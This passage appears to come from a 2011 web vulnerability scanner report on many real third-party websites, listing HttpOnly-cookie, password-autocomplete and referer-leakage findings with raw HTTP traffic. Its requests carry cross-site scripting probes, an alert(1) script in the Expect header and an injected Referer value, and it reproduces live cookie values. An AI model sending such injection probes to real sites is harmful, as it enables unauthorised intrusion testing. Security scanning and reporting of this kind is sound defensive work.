Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 60
Expires: Fri, 01 Apr 2011 16:12:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 16:12:02 GMT
Connection: close
Set-Cookie: BIGipServerAB_LionBAlt_Pool=/9YAG3eqnqAfQr70lbK+3V5LBy961j172i9L28GVIJ9z3jfQEX3mMTw6QfDSaFqtpprXEgXlHIiVYQg=; expires=Fri, 15-Apr-2011 16:12:02 GMT; path=/

The page cannot be displayed because the expectation failed.

7.226. http://www.volunteermatch.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volunteermatch.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-d8f3415a=d8f34156:0; expires=Fri, 01-Apr-11 15:48:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.volunteermatch.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 15:38:35 GMT
Connection: close
Server: Jetty(7.0.2.v20100331)
Set-Cookie: Coyote-2-d8f3415a=d8f34156:0; expires=Fri, 01-Apr-11 15:48:35 GMT; path=/

7.227. http://www.wpbf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wpbf.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

alpha=65ce8f18a56e00001706964d1b06020014130000; expires=Mon, 29-Mar-2021 17:06:31 GMT; path=/; domain=.wpbf.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.228. http://www.wyndham.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wyndham.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerprod-wyndham=117527818.20480.0000; expires=Fri, 01-Apr-2011 12:27:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wyndham.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:01:55 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerprod-wyndham=117527818.20480.0000; expires=Fri, 01-Apr-2011 12:27:01 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.229. http://www.zoomshare.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zoomshare.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dw=acbfe8a98d0ce6822f5006e8b1273fc9; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.zoomshare.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 15:47:16 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29 mod_fastcgi/2.4.2
Set-Cookie: dw=acbfe8a98d0ce6822f5006e8b1273fc9; path=/
Last-Modified: Thu, 17 Mar 2005 23:02:43 GMT
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: image/x-icon

..............h.......(....... ...........@...........................JS..........x..'1.._m..............<D..W^..lw..............HT..2;......t...........CK..........N[..CN..~...............tz..7@....
...[SNIP]...

8. Password field with autocomplete enabled previous next
There are 2 instances of this issue:

http://ecards.myfuncards.com/myfuncards/404
http://www.androidtapp.com/wp-login.php

8.1. http://ecards.myfuncards.com/myfuncards/404 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ecards.myfuncards.com
Path:	/myfuncards/404

Issue detail

The page contains a form with the following action URL:

http://ecards.myfuncards.com/registration/loginAjax.jhtml

The form contains the following password field with autocomplete enabled:

loginPassword

Request

Response

8.2. http://www.androidtapp.com/wp-login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-login.php

Issue detail

The page contains a form with the following action URL:

http://www.androidtapp.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

Response

9. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response 1

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:33 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:10:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-33_7878494541301681433; expires=Wed, 30-Mar-2016 18:10:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7878494541301681433; expires=Fri, 01-Apr-2011 18:25:33 GMT; path=/; domain=c3metrics.com
Content-Length: 6658
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttribute('id',this.c3VJS.c3VJSinViewPid)}var c=document.getElementsByTa
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response 2

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Content-Type: text/html

10. Cross-domain POST previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.phonedog.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonedog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

11. Cross-domain Referer leakage previous next
There are 72 instances of this issue:

http://ad.amgdgt.com/ads/
http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2
http://cim.meebo.com/cim/init.php
http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11
http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://ib.adnxs.com/ab
http://investor.infospaceinc.com/phoenix.zhtml
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://manhattan.ny1.com/Content/ServeContent.aspx
http://www.beatthetraffic.com/widgets/traveltimes.aspx
http://www.cambridge.org/uk/404_error.asp
http://www.dogpile.com/clickserver/_iceUrlFlag=1
http://www.dogpile.com/clickserver/_iceUrlFlag=1
http://www.dogpile.com/clickserver/_iceUrlFlag=1
http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7
http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/
http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/Content/ServeContent.aspx
http://www.ny1.com/favicon.ico
http://www.quickyellow.com/includes/all.topcategories.cfm

11.1. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bad56300&rnd=8574955118820071&clkurl=http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAjBvFyAAAAAA./cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ../referrer=http%3A%2F%2Fwww.quickyellow.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=490539097
http://servedby.adxpose.com/adxpose/find_ad.js
http://redcated/TLC/jview/253732017/direct/01/rnd=165539639?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUyW30Qztm7SXZXbccXK3nvwjZkkdnZW8sdXNhLHQsMTMwMTY4MTQ2NzQ3MCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUNBSUVBQUFBQUFBSUFnUUFBQUFFQXpNd3RBcEhBOUN0Y2pJMENrY0QwSzF5TWpRSmhtdmRXV2ZrRWZ2TnYyaTZnX0NqNDNGWlpOQUFBQUFPZ3VBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0NrREdVQXVRNEJBZ1VDQUFRQUFBQUFqQnZGeUFBQUFBQS4vY25kPSFUQV9obXdqYzh3SVF4OGtLR0FBZzBjY0JLR1V4TXpNekVkY2pJMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllwQmxnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJPZF82TmhXV1RjRGFQSTcxbEFmaHZxV0lCTmZxLU5NQmw2R1U3Qmkzek9MY0hBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESkJvSUJGMk5oTFhCMVlpMDRPREkxT0RreE5UZ3lNakUxTURRMW9BSEQ4djNzQTdJQkUzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMHZtQUs2UU1BQ0JNZ0NoZExQQ3FnREFlZ0QtUUxvQTdrSTZBUGdLdWdEQV9VREFBQUF4SUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR6WkFCQ1VQT1ZrdWsxb3lQMEtiRjh0cWtsOVNRJmNsaWVudD1jYS1wdWItODgyNTg5MTU4MjIxNTA0NSZhZHVybD0K/clkurl=
http://redcated/TLC/view/253732017/direct/01/rnd=165539639
http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU_6tNyNa8Hrnbi_NeghM_H09Dd4ADA3gBY2BgYGJg6lzCwJLdysDI.4OB4YYrAwMDJwMDo76Q0wc_3HKvdgDVgYHvVNEGBi4GhvSnTLKMOoxAMQNGoKkM.dsYpYC8ZZ1M0ozqQIayG6MkkJrPwCgHpNJXMgoAKblOVjWgrAajJqMWkBs2Bywpv4uZjZmdkQMoAnUH2CYAEFEaNA--; Domain=.amgdgt.com; Expires=Sun, 01-May-2011 18:11:07 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3813
Date: Fri, 01 Apr 2011 18:11:06 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=165539639?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUyW30Qztm7SXZXbccXK3nvwjZkkdnZW8sdXNhLHQsMTMwMTY4MTQ2NzQ3MCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUNBSUVBQUFBQUFBSUFnUUFBQUFFQXpNd3RBcEhBOUN0Y2pJMENrY0QwSzF5TWpRSmhtdmRXV2ZrRWZ2TnYyaTZnX0NqNDNGWlpOQUFBQUFPZ3VBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0NrREdVQXVRNEJBZ1VDQUFRQUFBQUFqQnZGeUFBQUFBQS4vY25kPSFUQV9obXdqYzh3SVF4OGtLR0FBZzBjY0JLR1V4TXpNekVkY2pJMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllwQmxnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJPZF82TmhXV1RjRGFQSTcxbEFmaHZxV0lCTmZxLU5NQmw2R1U3Qmkzek9MY0hBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESkJvSUJGMk5oTFhCMVlpMDRPREkxT0RreE5UZ3lNakUxTURRMW9BSEQ4djNzQTdJQkUzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMHZtQUs2UU1BQ0JNZ0NoZExQQ3FnREFlZ0QtUUxvQTdrSTZBUGdLdWdEQV9VREFBQUF4SUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR6WkFCQ1VQT1ZrdWsxb3lQMEtiRjh0cWtsOVNRJmNsaWVudD1jYS1wdWItODgyNTg5MTU4MjIxNTA0NSZhZHVybD0K/clkurl=">\n'+
'</script>
...[SNIP]...
ZExQQ3FnREFlZ0QtUUxvQTdrSTZBUGdLdWdEQV9VREFBQUF4SUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR6WkFCQ1VQT1ZrdWsxb3lQMEtiRjh0cWtsOVNRJmNsaWVudD1jYS1wdWItODgyNTg5MTU4MjIxNTA0NSZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=165539639" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=490539097" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

11.2. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.5122.NY1/B5147666.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2;sz=1x1;ord=4875694494694471?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1196992/1-1x1.gif

Request

GET /adi/N3941.5122.NY1/B5147666.2;sz=1x1;ord=4875694494694471? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 397
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 01 Apr 2011 18:10:29 GMT
Expires: Fri, 01 Apr 2011 18:10:29 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3adc/0/0/%2a/t;234645328;0-0;0;58432925;31-1/1;31161843/31179719/1;;~sscs=%3fhttp://www.timewarnercable.com/"><img src="http://s0.2mdn.net/viewad/1196992/1-1x1.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

11.3. http://cim.meebo.com/cim/init.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cim.meebo.com
Path:	/cim/init.php

Issue detail

The page was loaded from a URL containing a query string:

http://cim.meebo.com/cim/init.php?h=www.aeriagames.com&s=0&c=810058308&network=aeriagames&lang=en

The response contains the following links to other domains:

http://s.meebocdn.net/cim/script/languages/language-en_v88_cim_9_4_6.js
http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js

Request

GET /cim/init.php?h=www.aeriagames.com&s=0&c=810058308&network=aeriagames&lang=en HTTP/1.1
Host: cim.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=15a6c83c109b781d8bb4; tcookie=267e663c46bf3f71bb6e%26true%26AA%3D1%26AB%3D5%26AD%3D1%26AF%3D1%26AH%3D5%26AI%3D5%26AJ%3D1%26AK%3D1%26AL%3D5%26AM%3D5%26AN%3D5%26AQ%3D1%26AR%3D5%26AS%3D5%26AT%3D1%26AU%3D1%26ic17%3D1%26ic22%3D1%26ic16%3D1%26ic12%3D1%26ic24%3D1%26ic10%3D1%26ac17%3D1%26ac14%3D1%26ac10%3D1%26pc2%3D1%26pc1%3D1%26ac2%3D1%26ic3%3D1%26ic2%3D1%26ic6%3D1%26ic5%3D1%26ic19%3D1%26ac16%3D1%26ac12%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic1%3D1%26ac8%3D1%26AP%3D5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 18:17:17 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=14400, post-check=28800, pre-check=14400
ETag: 46336545
Vary: User-Agent, Accept-Language
Content-Length: 8492

;(function(){
var win = window;
while (win != win.parent && !win.Meebo) { win = win.parent; }
var doc = win.document;
var dr=function(){win.Meebo('domReady')};
if(win.addEventListener){
win.addEventL
...[SNIP]...
<body>'+bucketInc+'<script type="text/javascript" src="http://s.meebocdn.net/cim/script/languages/language-en_v88_cim_9_4_6.js"></script><script type="text/javascript" src="http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js"></script>
...[SNIP]...

11.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dogpile.com
Path:	/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
